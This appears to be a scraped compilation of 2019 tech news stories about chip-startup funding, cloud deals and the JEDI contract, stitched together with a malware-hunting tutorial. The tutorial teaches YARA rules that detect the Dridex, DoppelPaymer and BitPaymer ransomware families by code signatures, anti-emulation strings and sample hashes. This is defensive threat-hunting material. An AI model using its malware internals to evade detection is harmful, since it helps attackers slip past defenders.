Three of Apple and Google’s former star chip designers launch NUVIA with $53M in series A funding

Silicon is apparently the new gold these days, or so VCs hope.

What was once a no-go zone for venture investors, who feared the long development lead times and high technical risk facing new entrants in the semiconductor field, has turned into one of the hottest investment areas for enterprise and data VCs. Startups like Graphcore have reached unicorn status (after its $200 million series D a year ago), Groq closed $52 million from the likes of Chamath Palihapitiya of Social Capital fame, and Cerebras raised $112 million from Benchmark and others while announcing that it had produced the first trillion-transistor chip (I profiled the company a bit this summer).

Today, we have another entrant with another great technical team at the helm, this time with a Santa Clara, CA-based startup called NUVIA. The company announced this morning that it has raised a $53 million series A venture round co-led by Capricorn Investment Group, Dell Technologies Capital (DTC), Mayfield, and WRVI Capital, with participation from Nepenthe LLC.

Despite only getting started earlier this year, the company already has roughly 60 employees, with 30 more at various stages of accepted offers, and it may even crack 100 employees before the end of the year.

What’s happening here is a combination of trends in the compute industry. There has been an explosion in data and by extension, the data centers required to store all of that information, just as we have exponentially expanded our appetite for complex machine learning algorithms to crunch through all of those bits. Unfortunately, the growth in computation power is not keeping pace with our demands as Moore’s Law slows. Companies like Intel are hitting the limits of physics and our current know-how to continue to improve computational densities, opening the ground for new entrants and new approaches to the field.

Finding and building a dream team with a “chip” on their shoulder

There are two halves to the NUVIA story. First is the story of the company’s founders, which include John Bruno, Manu Gulati, and Gerard Williams III, who will be CEO. The three overlapped for a number of years at Apple, where they brought their diverse chip skillsets together to lead a variety of initiatives including Apple’s A-series of chips that power the iPhone and iPad. According to a press statement from the company, the founders have worked on a combined 20 chips across their careers and have received more than 100 patents for their work in silicon.

Gulati joined Apple in 2009 as a micro architect (or SoC architect) after a career at Broadcom, and a few months later, Williams joined the team as well. Gulati explained to me in an interview that, “So my job was kind of putting the chip together; his job was delivering the most important piece of IP that went into it, which is the CPU.” A few years later, around 2012, Bruno was poached from AMD and brought to Apple as well.

Gulati said that when Bruno joined, it was expected he would be a “silicon person” but his role quickly broadened to think more strategically about what the chipset of the iPhone and iPad should deliver to end users. “He really got into this realm of system-level stuff and competitive analysis and how do we stack up against other people and what’s happening in the industry,” he said. “So three very different technical backgrounds, but all three of us are very, very hands-on and, you know, just engineers at heart.”

Gulati would take an opportunity at Google in 2017 aimed broadly around the company’s mobile hardware, and he eventually pulled over Bruno from Apple to join him. The two eventually left Google earlier this year in a report first covered by The Information in May. For his part, Williams stayed at Apple for nearly a decade before leaving earlier this year in March.

The company is being stealthy about exactly what it is working on, which is typical in the silicon space, since it can take years to design, manufacture, and bring a product to market. That said, what’s interesting is that while the troika of founders all have backgrounds in mobile chipsets, they are focused on the data center broadly conceived (i.e. cloud computing) and, reading between the lines, specifically on finding more energy-efficient approaches that can combat the rising climate cost of machine learning workflows and computation-intensive processing.

Gulati told me that “for us, energy efficiency is kind of built into the way we think.”

The company’s CMO did tell me that the startup is building “a custom clean sheet designed from the ground up” and isn’t encumbered by legacy designs. In other words, the company is building its own custom core, but leaving its options open on whether it builds on top of ARM’s architecture (which is its intention today) or other architectures in the future.

Building an investor syndicate that’s willing to “chip” in

Outside of the founders, the other half of the NUVIA story is the collective of investors sitting around the table, all of whom not only have deep technical backgrounds, but also pockets deep enough to handle the technical risk that comes with new silicon startups.

Capricorn specifically invested out of what it calls its Technology Impact Fund, which focuses on funding startups that use technology to make a positive impact on the world. Its portfolio according to a statement includes Tesla, Planet Labs, and Helion Energy.

Meanwhile, DTC is the venture wing of Dell Technologies and its associated companies, and brings a deep background in enterprise and data centers, particularly from the group’s server business like Dell EMC. Scott Darling, who leads DTC, is joining NUVIA’s board, although the company is not disclosing the board composition at this time. Navin Chaddha, an electrical engineer by training who leads Mayfield, has invested in companies like HashiCorp, Akamai, and SolarCity. Finally, WRVI has a long background in enterprise and semiconductor companies.

I chatted a bit with Darling of DTC about what he saw in this particular team and their vision for the data center. In addition to liking each founder individually, Darling felt the team as a whole was just very strong. “What’s most impressive is that if you look at them collectively, they have a skillset and breadth that’s also stunning,” he said.

He confirmed that the company is broadly working on data center products, but said the company is going to lie low on its specific strategy during product development. “No point in being specific, it just engenders immune reactions from other players so we’re just going to be a little quiet for a while,” he said.

He apologized for “sounding incredibly cryptic” but said that the investment thesis from his perspective for the product was that “the data center market is going to be receptive to technology evolutions that have occurred in places outside of the data center that’s going to allow us to deliver great products to the data center.”

Interpolating that statement a bit with the mobile chip backgrounds of the founders at Google and Apple, it seems evident that the extreme energy-to-performance constraints of mobile might find some use in the data center, particularly given the heightened concerns about power consumption and climate change among data center owners.

DTC has been a frequent investor in next-generation silicon, including joining the series A investment of Graphcore back in 2016. I asked Darling whether the firm was investing aggressively in the space or sort of taking a wait-and-see attitude, and he explained that the firm tries to keep a consistent volume of investments at the silicon level. “My philosophy on that is, it’s kind of an inverted pyramid. No, I’m not gonna do a ton of silicon plays. If you look at it, I’ve got five or six. I think of them as the foundations on which a bunch of other stuff gets built on top,” he explained. He noted that each investment in the space is “expensive” given the work required to design and field a product, and so these investments have to be carefully made with the intention of supporting the companies for the long haul.

That explanation was echoed by Gulati when I asked how he and his co-founders came to closing on this investor syndicate. Given the reputations of the three, they would have had easy access to any VC in the Valley. He said about the final investors:

They understood that putting something together like this is not going to be easy and it’s not for everybody … I think everybody understands that there’s an opportunity here. Actually capitalizing upon it and then building a team and executing on it is not something that just anybody could possibly take on. And similarly, it is not something that every investor could just possibly take on in my opinion. They themselves need to have a vision on their side and not just believe our story. And they need to strategically be willing to help and put in the money and be there for the long haul.

It may be a long haul, but Gulati noted that “on a day-to-day basis, it’s really awesome to have mostly friends you work with.” With perhaps 100 employees by the end of the year and tens of millions of dollars already in the bank, they have their war chest and their army ready to go. Now comes the fun (and hard) part as we learn how the chips fall.

Update: Changed the text to reflect that NUVIA is intending to build on top of ARM’s architecture, but isn’t a licensed ARM core.

Why Salesforce is moving Marketing Cloud to Microsoft Azure

When Salesforce announced this week that it was moving Marketing Cloud to Microsoft Azure, it was easy to see this as another case of wacky enterprise partnerships. But there had to be sound business reasons why the partnership came together, rather than going with AWS or Google Cloud Platform, both of which are also Salesforce partners in other contexts.

If you ask Salesforce, it says the decision ultimately came down to compatibility with Microsoft SQL Server.

“Salesforce chose Azure because it is a trusted platform with a global footprint, multi-layered security approach, robust disaster recovery strategy with auto failover, automatic updates and more,” a Salesforce spokesperson told TechCrunch. “Marketing Cloud also has a long standing relationship with Microsoft SQL which makes the transition to SQL on Azure a natural decision.”

Except for the SQL part, Microsoft’s chief rivals at AWS and Google Cloud Platform also provide those benefits. In fact, each of the reasons cited by the spokesperson, with the exception of SQL, is part of the general cloud infrastructure value proposition that every major cloud vendor provides.

There’s probably more to it than simply compatibility. There is also a long-standing rivalry between the two companies, which raises the question of why, in spite of their competition, they continue to make deals like this in the spirit of co-opetition. We spoke to a few industry experts to get their take on the deal and find out why these two seeming rivals decided to come together.

Retailer’s dilemma

Tony Byrne, founder and principal analyst at Real Story Group, thinks it could be related to the fact that it’s a marketing tool, and that some customers may be wary of hosting their businesses on AWS while competing with Amazon on the retail side. This is a common argument for why retail customers in particular are more likely to go with Microsoft or Google over AWS.

“Salesforce Marketing Cloud tends to target B2C enterprises, so the choice of Azure makes sense in one context where some B2C firms are wary of Amazon for competitive reasons. But I’d also imagine there’s more to the decision than that,” Byrne said.

YARA Hunting for Code Reuse: DoppelPaymer Ransomware & Dridex Families


The Zero2Hero malware course concludes with Vitali Kremez explaining how to hunt malware families such as DoppelPaymer, BitPaymer & Dridex loader using YARA rules.

[Image: YARA hunting]

Whenever we discuss how to proactively hunt for malware of interest, whether it be crimeware or APT for threat intelligence purposes, YARA is the true Swiss Army knife that makes the work of malware researchers and threat intelligence analysts that much easier.

Malware developers work just like legitimate software developers, aiming to automate their work and reduce the time wasted on repetitive tasks wherever possible. That means they create and reuse code across their malware. This has a pay-off for malware hunters: we can learn how to create search rules to detect this kind of code reuse, reducing our workload, too! In this post, we will learn how to write YARA rules for the following three crimeware variants belonging to the Dridex family:

  • BitPaymer ransomware (known as “wp_encrypt”), part of the Everis extortion case
  • DoppelPaymer ransomware, leveraged in the PEMEX lockdown
  • Dridex Loader (known as “ldr”), botnet ID “23005”

[Image: DoppelPaymer]

In a nutshell, our goal is to hunt for the malware developer’s code by leveraging YARA code-reuse rules, rather than relying on rules that cover easily changeable strings.

One of YARA’s primary original purposes was to classify and identify malware samples. It uses a rather simple rule syntax, resembling C, to describe various patterns.

The latest YARA version is 3.11.0. YARA is a signature-based command-line tool with bindings for various programming languages. In other words, it is similar to the static anti-virus signatures used to detect malicious files.

The major functionality of YARA is to scan folders of files, and memory buffers, for patterns. Many tools rely on YARA, such as yarashop, for example.

For our purposes, the most common uses of YARA are to scan, categorize, and identify malware samples of interest based on code and string reuse.

The typical YARA syntax example is as follows:

import <module>

<rule type> rule <rule name> : <tags>
{
    meta:
        <name> = ""
        ...
    strings:
        $<string name> = <value> <modifiers>
        ...
    condition:
        <some condition>
}


Let’s practice writing YARA rules for Zero2Hero:

/*

We practice writing YARA rules for Zero2Hero

*/

import "pe"

rule zero2hero_course : best 
{
    meta:
        // Comment
        description = "This is an example rule to demonstrate typical syntax"
        reference = "https://www.sentinelone.com/lp/zero2hero"
        author = "@VK_Intel"
        tlp = "white"

    strings:
        $hero = "helloworld" xor wide
        $unique_function = { ?? ?? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? }

    condition:
        uint16(0) == 0x5A4D and pe.exports("CryptEncrypt") and all of them
}
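The condition’s `uint16(0) == 0x5A4D` clause reads the first two bytes of the file as a little-endian 16-bit integer and compares them against the “MZ” magic that opens every PE executable. As a minimal Python sketch of the same check:

```python
import struct

def looks_like_pe(data: bytes) -> bool:
    """Mimic YARA's `uint16(0) == 0x5A4D`: read the first two bytes
    as a little-endian uint16 and compare against the 'MZ' magic."""
    if len(data) < 2:
        return False
    return struct.unpack_from("<H", data, 0)[0] == 0x5A4D

print(looks_like_pe(b"MZ\x90\x00"))  # True: b"MZ" reads as 0x5A4D little-endian
print(looks_like_pe(b"\x7fELF"))     # False: an ELF header, not a PE
```

This cheap header check lets the rule skip non-PE files before evaluating the more expensive string and code patterns.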

The additional rule modifiers are as follows:

    global: must match before any other rules in the ruleset are reported
    private: not reported in the output; used as a building block for other rules
    (no modifier): a regular rule that matches and is reported on its own

The string types and modifiers are as follows:

    strings: regular expressions, text, or hex patterns
    string modifiers: wide, ascii, xor, fullword, nocase

The conditions can be as follows:

    Boolean expressions
    Built-in, external, module variables, and functions

YARA String & Code Reuse Hunting 

There is a difference between writing YARA rules for malware hunting versus detection. In this part of the course, we aim to produce “looser” YARA rules for threat-hunting purposes, with a higher chance of capturing newer variants at the cost of more false positives. In other contexts, you may want stricter YARA rules for a specific detection mechanism and malware strain.

By and large, YARA rules are only as good as the data sources they are vetted against. Anti-virus companies and malware researchers rely on large datasets of known-good and known-bad (and known-random) samples to produce the highest-fidelity rules, as it is often hard to predict a YARA rule’s performance given the limited view of an individual researcher.

Some of the known bad and known good data sources for YARA rules performance include VirusTotal, Hybrid-Analysis, VirusBay, Malpedia, Microsoft, and VirusShare. Florian Roth’s tool yarGen includes some of the necessary string and opcode datasets for YARA performance checks as well. Another excellent tool for YARA rule management is the KLara tool developed by Kaspersky.

A major property of YARA rules that leads to successful, long-lived hits is combining both string-based and code-based coverage. We believe that the key to efficient YARA rules is simple and clear rulesets utilizing both. I highly recommend watching Jay Rosenberg’s presentation from Confidence Conference 2019, entitled Utilizing YARA to Find Evolving Malware.

When creating code-reuse YARA rules, we need to be aware of compilation flags, different compilers, and slightly altered code, any of which can change the emitted bytes and break the YARA rules. Consequently, we should wildcard (??) certain bytes, such as the registers used, which can change from one sample to another.

For example, instructions such as xor eax, eax produce different opcodes depending on the register being xor’ed. Skipping one to two bytes with a “[1-2]” jump is often necessary to survive different compilers and make the YARA rules cover different build environments.
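To see why the register choice changes the bytes, consider 32-bit register-to-register XOR on x86: the opcode 0x31 is followed by a ModRM byte that encodes both registers, so the same mnemonic yields different byte sequences. A small sketch of that encoding:

```python
# x86 32-bit register numbering used in instruction encoding
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def xor_reg_reg(src: str, dst: str) -> bytes:
    """Encode `xor dst, src` (register-to-register, 32-bit):
    opcode 0x31 followed by a ModRM byte of 0b11, src, dst."""
    modrm = 0xC0 | (REGS.index(src) << 3) | REGS.index(dst)
    return bytes([0x31, modrm])

print(xor_reg_reg("eax", "eax").hex())  # 31c0
print(xor_reg_reg("ebx", "ebx").hex())  # 31db -- same mnemonic, different bytes
```

A byte-exact signature on `31 c0` would miss the `31 db` variant; wildcarding the ModRM byte (`31 ??`) covers both.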

The cyclical nature of the YARA rule development can be described in the following 7 steps:

    1. Malware analysis 
    2. Identification of malware string and code “uniqueness”
    3. Prototype the YARA rule based on the findings
    4. Test the prototype rule across diverse malware families and against both clean and malicious data sources
    5. Deploy the rule to hunt for the samples
    6. Review and monitor for possible false positives and/or false negatives outside of the testing phase and initial malware analysis
    7. Repeat

Practical Crimeware Code Reuse: “Dridex” Malware Family

Dridex is by far one of the most complex and sophisticated pieces of malware in the crimeware landscape.

The malware is also referred to as “Bugat” and “Cridex” by various researchers. The original Bugat malware dates back to 2010 and at one point rivaled the “Zeus” banking malware.

The development group behind it is responsible for the three malware variants, which are the subject of our YARA course:

  • BitPaymer ransomware (known as “wp_encrypt”), part of the Everis extortion case
  • DoppelPaymer ransomware, leveraged in the PEMEX lockdown
  • Dridex Loader (known as “ldr”), botnet ID “23005”

[Image: Dridex]

The YARA rule for the overarching code reuse across the Dridex developer samples is based on the unique API hashing function used to resolve the Windows API calls. It is one of the most obvious unique features of this family.

Based on the API hashing function (as seen in the screenshot above), the Dridex developer family can be described by the following YARA rule:

rule dridex_family
{
    strings:
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ?? }

    condition:
        $code
}
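To make concrete what such a masked hex pattern does, here is a minimal Python sketch of a YARA-style wildcard matcher. It is a simplification: real YARA also supports jumps like [1-2], alternation, and far faster scanning.

```python
def parse_pattern(pattern: str):
    """Parse a YARA-style hex pattern like '5? 5? 8b fa' into
    (value, mask) pairs; a '?' nibble matches anything."""
    pairs = []
    for tok in pattern.split():
        hi, lo = tok[0], tok[1]
        value = (int(hi, 16) << 4 if hi != "?" else 0) | (int(lo, 16) if lo != "?" else 0)
        mask = (0xF0 if hi != "?" else 0x00) | (0x0F if lo != "?" else 0x00)
        pairs.append((value, mask))
    return pairs

def find_pattern(data: bytes, pattern: str) -> int:
    """Return the first offset where the masked pattern matches, or -1."""
    pairs = parse_pattern(pattern)
    n = len(pairs)
    for off in range(len(data) - n + 1):
        if all((data[off + i] & m) == v for i, (v, m) in enumerate(pairs)):
            return off
    return -1

# push edi (0x57) and push esi (0x56) both match the `5?` wildcard token
buf = bytes.fromhex("9090" + "57568bfa" + "90")
print(find_pattern(buf, "5? 5? 8b fa"))  # 2
```

This is why the `5? 5?` prefix in the rule above survives samples that push different registers before calling the hashing function.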

Always test the rules, for example via the command line (the rule file and target folder names here are illustrative):

yara -s dridex_family.yar samples/

Testing the YARA rule reveals multiple hits on the Dridex family across the folder.

[Image: YARA hunt results]

Uniting Code Reuse & String Detection 

I. DoppelPaymer ransomware contains a peculiar string, reused across samples, that we can add to the Dridex family code reuse: it copies the Unicode string "Setup runn" to eax via an lstrcpyW API call.

The possible specific DoppelPaymer ransomware rule is as follows:

[Image: YARA rule for DoppelPaymer]

rule crime_win32_ransomware_doppelpaymer_1
{
    strings:
        $str1 = "Setup runn" wide
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}

    condition:
        $code and $str1
}
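The wide modifier in the rule above matches the UTF-16LE (“wide”) encoding of the string, which is how Windows stores such strings internally: each ASCII character followed by a zero byte. A quick Python illustration:

```python
def wide(s: str) -> bytes:
    """Approximate YARA's `wide` modifier: match the UTF-16LE encoding
    of a string, i.e. each ASCII character followed by a zero byte."""
    return s.encode("utf-16-le")

needle = wide("Setup runn")
print(needle[:4])                              # b'S\x00e\x00'
print(needle in (b"\x00" + needle + b"\xff"))  # True
```

Without wide, a plain ascii string would never hit, because the raw bytes in the binary are interleaved with nulls.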

II. BitPaymer ransomware contains the same referenced string across samples, acting as an anti-Windows Defender emulator check: it checks for the existence of the file "C:\aaa_TouchMeNot_.txt", which is indicative of the Windows Defender sandbox.

The possible specific BitPaymer ransomware rule is as follows:

[Image: BitPaymer]

rule crime_win32_ransomware_bitpaymer_1
{
    strings:
        $str1 = "C:aaa_TouchMeNot_.txt" wide
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}

    condition:
        $code and $str1
}

III. Across the Dridex loader samples, the malware carries the same string "installed", called via OutputDebugStringW many times as an anti-emulation technique. It is indicative of the Dridex loader.

The possible specific Dridex loader rule is as follows:

[Image: Dridex loader]

rule crime_win32_loader_dridex_1
{
    strings:
        $str1 = "installed" wide
        $code = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}
    condition:
        $code and $str1
}


A final YARA rule covering both code and strings for the unpacked DoppelPaymer ransomware payload, for example, is as follows:

rule crime_win32_doppelpaymer_ransomware_1 
{
    meta:
        description = "Detects DoppelPaymer payload Nov 11 Signed"
        author = "@VK_Intel"
        reference = "https://twitter.com/VK_Intel/status/1193937831766429696"
        date = "2019-11-11"
        hash1 = "46254a390027a1708f6951f8af3da13d033dee9a71a4ee75f257087218676dd5"

    strings:
        $s1 = "Setup run" wide
        $hash_function = { 5? 5? 8b fa 8b ?? 8b cf e8 ?? ?? ?? ?? 85 c0 75 ?? 81 ?? ?? ?? ?? ?? 7? ??}

    condition:
        ( uint16(0) == 0x5a4d and
            filesize < 2500KB and
            ( all of them )
        )
}

Malware Samples

DoppelPaymer Ransomware (unpacked) SHA-256: 46254a390027a1708f6951f8af3da13d033dee9a71a4ee75f257087218676dd5

BitPaymer Ransomware (unpacked) SHA-256: 78e180e5765aa7f4b89d6bcd9bcef1dd1e0d0261ad0f9c3ec6ab0635bf494eb3

Dridex Banker (unpacked) SHA-256: ce509469b80b97e857bcd80efffc448a8d6c63f33374a43e4f04f526278a2c41



Eigen nabs $37M to help banks and others parse huge documents using natural language and ‘small data’

One of the bigger trends in enterprise software has been the emergence of startups building tools to make the benefits of artificial intelligence technology more accessible to non-tech companies. Today, one that has built a platform to apply the power of machine learning and natural language processing to massive documents of unstructured data has closed a round of funding as it finds strong demand for its approach.

Eigen Technologies, a London-based startup whose machine learning engine helps banks and other businesses that need to extract information and insights from large and complex documents like contracts, is today announcing that it has raised $37 million in funding, a Series B that values the company at around $150 million – $180 million.

The round was led by Lakestar and Dawn Capital, with Temasek and Goldman Sachs Growth Equity (which co-led its Series A) also participating. Eigen has now raised $55 million in total.

Eigen today is working primarily in the financial sector — its offices are smack in the middle of The City, London’s financial center — but the plan is to use the funding to continue expanding the scope of the platform to cover other verticals such as insurance and healthcare, two other big areas that deal in large, wordy documentation that is often inconsistent in how it’s presented, full of essential fine print, and typically a strain on an organisation’s resources to handle correctly (and often a disaster when it is not).

The focus up to now on banks and other financial businesses has gained a lot of traction. The company says its customer base now includes 25% of the world’s G-SIB institutions (that is, the world’s biggest banks), along with others that work closely with them, like Allen & Overy and Deloitte. Since June 2018 (when it closed its Series A round), Eigen has seen recurring revenues grow sixfold, while headcount (mostly data scientists and engineers) has doubled. While Eigen doesn’t disclose specific financials, you can see the growth trajectory that contributed to the company’s valuation.

The basic idea behind Eigen is that it focuses on what co-founder and CEO Lewis Liu describes as “small data.” The company has devised a way to “teach” an AI to read a specific kind of document — say, a loan contract — by looking at a couple of examples and training on these. The whole process is relatively easy for a non-technical person: you figure out what you want to look for and analyse, find the examples using basic search in two or three documents, and create the template, which can then be used across hundreds or thousands of the same kind of documents (in this case, loan contracts).

Eigen’s work is notable for two reasons. First, training an AI system typically requires hundreds, thousands, even tens of thousands of examples to “teach” it before it can make decisions that you hope will mimic those of a human. Eigen requires just a couple of examples (hence the “small data” approach).

Second, an industry like finance has many pieces of sensitive data (either because it’s personal data, or because it’s proprietary to a company and its business), and so there is an ongoing issue of working with AI companies that want to “anonymise” and ingest that data. Companies simply don’t want to do that. Eigen’s system essentially only works on what a company provides, and that stays with the company.

Eigen was founded in 2014 by Dr. Lewis Z. Liu (CEO) and Jonathan Feuer (a managing partner at CVC Capital Partners, who is the company’s chairman), but its earliest origins go back 15 years earlier, when Liu — a first-generation immigrant who grew up in the U.S. — was working as a “data-entry monkey” (his words) at a tire manufacturing plant in New Jersey, where he lived, ahead of starting university at Harvard.

A natural computing whiz who found himself building his own games when his parents refused to buy him a games console, he figured out that the many pages of printouts he was reading and re-entering into a different computing system could be sped up with a computer program linking up the two. “I put myself out of a job,” he joked.

His educational life epitomises the kind of lateral thinking that often produces the most interesting ideas. Liu went on to Harvard to study not computer science, but physics and art. Doing a double major required working on a thesis that merged the two disciplines, and Liu built “electrodynamic equations that composed graphical structures on the fly” — basically generating art using algorithms — which he then turned into a “Turing test” to see if people could distinguish pixelated actual artwork from the output of his program. Distill this, and Liu was still thinking about patterns in analog material that could be re-created using math.

Then came years at McKinsey in London (which is how he arrived on these shores) during the financial crisis, when the consequences of people either intentionally or mistakenly overlooking crucial text-based data proved stark and catastrophic. “I would say the problem that we eventually started to solve for at Eigen became tangible,” Liu said.

Then came a physics PhD at Oxford, where Liu worked on X-ray lasers that could decrease the complexity and cost of making microchips, and that had applications in cancer treatment and elsewhere.

While Eigen doesn’t actually use lasers, some of the mathematical equations that Liu came up with for these have also become a part of Eigen’s approach.

“The whole idea [for my PhD] was, ‘how do we make this cheaper and more scalable?,’ ” he said. “We built a new class of X-ray laser apparatus, and we realised the same equations could be used in pattern matching algorithms, specifically around sequential patterns. And out of that, and my existing corporate relationships, that’s how Eigen started.”

Five years on, Eigen has added a lot more into the platform beyond what came from Liu’s original ideas. There are more data scientists and engineers building the engine around the basic idea, and customising it to work with more sectors beyond finance. 

There are a number of AI companies building tools for non-technical business end-users, and one of the areas that comes closest to what Eigen is doing is robotic process automation, or RPA. Liu notes that while this is an important area, it’s more about reading forms and providing insights from them. The focus of Eigen is more on unstructured data, and the ability to parse it quickly and securely using just a few samples.

Liu points to companies like IBM (with Watson) as general competitors, while startups like Luminance take a similar approach to Eigen’s, addressing the issue of parsing unstructured data in a specific sector (in Luminance’s case, currently, the legal profession).

Stephen Nundy, a partner and the CTO of Lakestar, said that he first came into contact with Eigen when he was at Goldman Sachs, where he was a managing director overseeing technology, and the bank engaged it for work.

“To see what these guys can deliver, it’s to be applauded,” he said. “They’re not just picking out names and addresses. We’re talking deep, semantic understanding. Other vendors are trying to be everything to everybody, but Eigen has found market fit in financial services use cases, and it stands up against the competition. You can see when a winner is breaking away from the pack and it’s a great signal for the future.”

Moveworks snags $75M Series B to resolve help desk tickets with AI

Moveworks, a startup using AI to help resolve help desk tickets in an automated fashion, announced a $75 million Series B investment today.

The round was led by Iconiq Capital, Kleiner Perkins and Sapphire Ventures. Existing investors Lightspeed Venture Partners, Bain Capital Ventures and Comerica Bank also participated. The round also included a personal investment from John W. Thompson, a partner at Lightspeed Venture Partners and chairman at Microsoft. Today’s investment brings the total raised to $105 million, according to the company.

That’s a lot of money for an early-stage company, but CEO and co-founder Bhavin Shah says his company is solving a common problem using AI. “Moveworks is a machine learning platform that uses natural language understanding to take tickets that are submitted by employees every day to their IT teams for stuff they need, and we understand [the content of the tickets], interpret them, and then we take the actions to resolve them [automatically],” Shah explained.

He said the company decided to focus on help desk tickets because, when they were forming the company, they saw data suggesting that tickets cluster around a common set of questions, which would make these issues easier to interpret and resolve. In fact, they are currently able to resolve 25-40% of all tickets autonomously.

He says this should lead to greater user satisfaction because some of their problems can be resolved immediately, even when IT personnel aren’t around to help. Instead of filing a ticket and waiting for an answer, Moveworks can provide the answer, at least part of the time, without human intervention.

Aditya Agrawal, a partner at Iconiq, says that the company really captured his attention. “Moveworks is not just transforming IT operations, they are building a more modern and enlightened way to work. They’ve built a platform that simplifies and streamlines every interaction between employees and IT, enabling both to focus on what matters,” he said in a statement.

The company was founded in 2016, and in the early days was only resolving 2% of the tickets autonomously, so it has seen major improvement. It already has 115 employees and dozens of customers (although Shah didn’t want to provide an exact number).

Salesforce announces it’s moving Marketing Cloud to Microsoft Azure

In the world of enterprise software, there are often strange bedfellows. Just yesterday, Salesforce announced a significant partnership with AWS around the Cloud Information Model. This morning, it announced it was moving its Marketing Cloud to Microsoft Azure. That’s the way that enterprise partnerships shimmy and shake sometimes.

The companies also announced they were partnering around Microsoft Teams, integrating Teams with Salesforce Sales Cloud and Service Cloud.

Salesforce plans to move Marketing Cloud, which has been running in its own data centers, to Microsoft Azure in the coming months, although the exact migration plan timeline is not clear yet. This is a big deal for Microsoft, which competes fiercely with AWS for customers. AWS is the clear market leader in the space, but Microsoft has been a strong second for some time now, and bringing Salesforce on board as a customer is certainly a quality reference for the company.

Brent Leary, founder at CRM Essentials, who has been watching the market for many years, says the partnership says a lot about Microsoft’s approach to business today, and that it’s willing to partner broadly to achieve its goals. “I think the bigger news is that Salesforce chose to go deeper with Microsoft over Amazon, and that Microsoft doesn’t fear strengthening Salesforce at the potential expense of Dynamics 365 (its CRM tool), mainly because their biggest growth driver is Azure,” Leary told TechCrunch.

Microsoft and Salesforce have always had a complex relationship. In the Steve Ballmer era, they traded dueling lawsuits over their CRM products. Later, Satya Nadella kindled a friendship of sorts by appearing at Dreamforce in 2015. The relationship has ebbed and flowed since, but with this announcement, it appears the frenemies are closer to friends than enemies again.

Let’s not forget though, that it was just yesterday that Salesforce announced a partnership with AWS around the Cloud Information Model, one that competes directly with a different partnership between Adobe, Microsoft and SAP; or that just last year Salesforce announced a significant partnership with AWS around data integration.

These kinds of conflicting deals are confusing, but they show that in today’s connected cloud world, companies that will compete hard with one another in one part of the market may still be willing to partner in other parts when it makes sense for both parties and for customers. That appears to be the case with today’s announcement from these companies.

Adobe announces GA of customer data platform

The customer data platform (CDP) is the newest tool in the customer experience arsenal as big companies try to help customers deal with data coming from multiple channels. Today, Adobe announced the general availability of its CDP.

The CDP is like a central data warehouse for all the information you have on a single customer. This crosses channels like web, email, text, chat and brick and mortar in-person visits, as well as systems like CRM, e-commerce and point of sale. The idea is to pull all of this data together into a single record to help companies have a deep understanding of the customer at an extremely detailed level. They then hope to leverage that information to deliver highly customized cross-channel experiences.

The idea is to take all of this information and give marketers the tools they need to take advantage of it. “We want to make sure we create an offering that marketers can leverage and makes use of all of that goodness that’s living within Adobe Experience platform,” Nina Caruso, product marketing manager for Adobe Audience Manager, explained.

She said that would involve packaging and presenting the data in such a way to make it easier for marketers to consume, such as dashboards to deliver the data they want to see, while taking advantage of artificial intelligence and machine learning under the hood to help them find the data to populate the dashboards without having to do the heavy lifting.

Beyond that, having access to real-time streaming data in one place under the umbrella of the Adobe Experience Platform should enable marketers to create much more precise market segments. “Part of real-time CDP will be building productized primo maintained integrations for marketers to be able to leverage, so that they can take segmentations and audiences that they’ve built into campaigns and use those across different channels to provide a consistent customer experience across that journey life cycle,” Caruso said.

As you can imagine, bringing all of this information together, while providing a platform for customization for the customer, raises all kinds of security and privacy red flags at the same time. This is especially true in light of GDPR and the upcoming California privacy law. Companies need to be able to enforce data usage rules across the platform.

To that end, the company also announced the availability of Adobe Experience Platform Data Governance, which helps companies define a set of rules around the data usage. This involves “frameworks that help [customers] enforce data usage policies and facilitate the proper use of their data to comply with regulations, obligations and restrictions associated with various data sets,” according to the company.

“We want to make sure that we offer our customers the controls in place to make sure that they have the ability to appropriately govern their data, especially within the evolving landscape that we’re all living in when it comes to privacy and different policies,” Caruso said.

These tools are now available to Adobe customers.

AWS confirms reports it will challenge JEDI contract award to Microsoft

Surely just about everyone was surprised when the Department of Defense last month named Microsoft as the winner of the decade-long, $10 billion JEDI cloud contract — none more so than Amazon, the company everyone assumed all along would be the winner. Today the company confirmed earlier reports that it was challenging the contract award in the Court of Federal Claims.

The Federal Times broke this story.

In a statement, an Amazon spokesperson suggested that there was possible bias and issues in the selection process. “AWS is uniquely experienced and qualified to provide the critical technology the U.S. military needs, and remains committed to supporting the DoD’s modernization efforts. We also believe it’s critical for our country that the government and its elected leaders administer procurements objectively and in a manner that is free from political influence.

“Numerous aspects of the JEDI evaluation process contained clear deficiencies, errors, and unmistakable bias — and it’s important that these matters be examined and rectified,” an Amazon spokesperson told TechCrunch.

It’s certainly worth noting that the president has not hidden his disdain for Amazon CEO and founder Jeff Bezos, who also is owner of The Washington Post newspaper. As I wrote in Even after Microsoft wins, JEDI saga could drag on:

Amazon, for instance, could point to Jim Mattis’ book where he wrote that the president told the then Defense Secretary to “screw Bezos out of that $10 billion contract.” Mattis says he refused, saying he would go by the book, but it certainly leaves the door open to a conflict question.

Oracle also filed a number of protests throughout the process, including one with the Government Accountability Office that was later rejected. It also went to court and the case was dismissed. All of the protests claimed that the process favored Amazon. The end result proved it didn’t.

The president inserted himself into the decision process in August, asking the defense secretary, Mark T. Esper, to investigate once again whether the procurement process somehow favored Amazon, and the week the contract was awarded, the White House canceled its subscription to The Washington Post.

In October, the decision finally came and the DoD chose Microsoft. Now Amazon is filing a challenge in federal court, and the JEDI saga really ain’t over until it’s over.

 

Privilege Escalation | macOS Malware & The Path to Root Part 2

